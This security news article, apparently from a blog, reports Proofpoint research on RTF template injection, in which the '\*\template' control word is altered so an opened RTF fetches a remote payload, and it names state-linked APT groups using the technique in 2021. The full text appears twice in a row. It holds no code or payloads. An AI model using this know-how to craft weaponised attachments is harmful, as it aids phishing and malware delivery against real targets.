RTF template injection is a novel technique in which an RTF (Rich Text Format) containing malicious file can be altered to allow for easy retrieval of content hosted on external URL upon opening the RTF file.

According to researchers at Proofpoint, there is an increase in the adoption of the novel and easily implemented phishing attachment technique by APT groups, with different state-sponsored threat actors including those aligned with China and Russia haven been observed using the new template injection as part of their campaigns to deliver malware to targeted victims.

RTF template injection leverages the legitimate RTF template functionality to subvert the plain text document formatting properties of an RTF file and allows the retrieval of a URL resource instead of a file resource via RTF’s template control word capability, which enables a threat actor to replace a legitimate file destination with a URL from which a remote payload can be retrieved.

And by simply altering RTF file’s document formatting properties, specifically the document formatting control word for “\*\template” structure, threat actors can weaponize an RTF file to retrieve remote content by specific URL resource instead of an accessible file resource destination.

How APT Threat Actors are Adopting RTF Template Injection?



APT groups believed to be affiliated to the state interests of India, Russia and China have all adopted RTF template injection, with the template injection RTF files attributable to the DoNot Team, historically been suspected of being aligned with Indian-state interests.



RTF files attributable to a Chinese-related APT group were identified as at September 29, 2021, which targets entities with ties to Malaysian energy exploration. While within this initial adoption period, Gamaredon, an APT group believed to be linked to the Russian Federal Security Service (FSB), was observed utilizing RTF template injection files in phishing campaigns that targeted Ukrainian governmental with file lures on October 5, 2021.

While historically the use of malicious RTF contents has been well documented as a method for delivering malware using RTFs, this new technique is more unique, simplistic and serves as a more effective method for remote payload delivery than previously documented techniques.

How to Safeguard your Systems against RTF Template Injection



RTF template injection is poised for wider adoption in the threat landscape based on its ease of use and its relative effectiveness compared with other phishing attachment template injection-based techniques.

Therefore, organizations should take a defensive, reactive approach to their security and most importantly, remain constantly vigilant, iterating on security procedures to ensure they are not caught off-guard when new RTF Template Injection are deployed to breach their defenses.

Cybercriminals Increasingly Adopting RTF Template Injection Technique

RTF template injection is a novel technique in which an RTF (Rich Text Format) containing malicious file can be altered to allow for easy retrieval of content hosted on external URL upon opening the RTF file.

According to researchers at Proofpoint, there is an increase in the adoption of the novel and easily implemented phishing attachment technique by APT groups, with different state-sponsored threat actors including those aligned with China and Russia haven been observed using the new template injection as part of their campaigns to deliver malware to targeted victims.

RTF template injection leverages the legitimate RTF template functionality to subvert the plain text document formatting properties of an RTF file and allows the retrieval of a URL resource instead of a file resource via RTF’s template control word capability, which enables a threat actor to replace a legitimate file destination with a URL from which a remote payload can be retrieved.

And by simply altering RTF file’s document formatting properties, specifically the document formatting control word for “\*\template” structure, threat actors can weaponize an RTF file to retrieve remote content by specific URL resource instead of an accessible file resource destination.

How APT Threat Actors are Adopting RTF Template Injection?



APT groups believed to be affiliated to the state interests of India, Russia and China have all adopted RTF template injection, with the template injection RTF files attributable to the DoNot Team, historically been suspected of being aligned with Indian-state interests.



RTF files attributable to a Chinese-related APT group were identified as at September 29, 2021, which targets entities with ties to Malaysian energy exploration. While within this initial adoption period, Gamaredon, an APT group believed to be linked to the Russian Federal Security Service (FSB), was observed utilizing RTF template injection files in phishing campaigns that targeted Ukrainian governmental with file lures on October 5, 2021.

While historically the use of malicious RTF contents has been well documented as a method for delivering malware using RTFs, this new technique is more unique, simplistic and serves as a more effective method for remote payload delivery than previously documented techniques.

How to Safeguard your Systems against RTF Template Injection



RTF template injection is poised for wider adoption in the threat landscape based on its ease of use and its relative effectiveness compared with other phishing attachment template injection-based techniques.

Therefore, organizations should take a defensive, reactive approach to their security and most importantly, remain constantly vigilant, iterating on security procedures to ensure they are not caught off-guard when new RTF Template Injection are deployed to breach their defenses.

No comments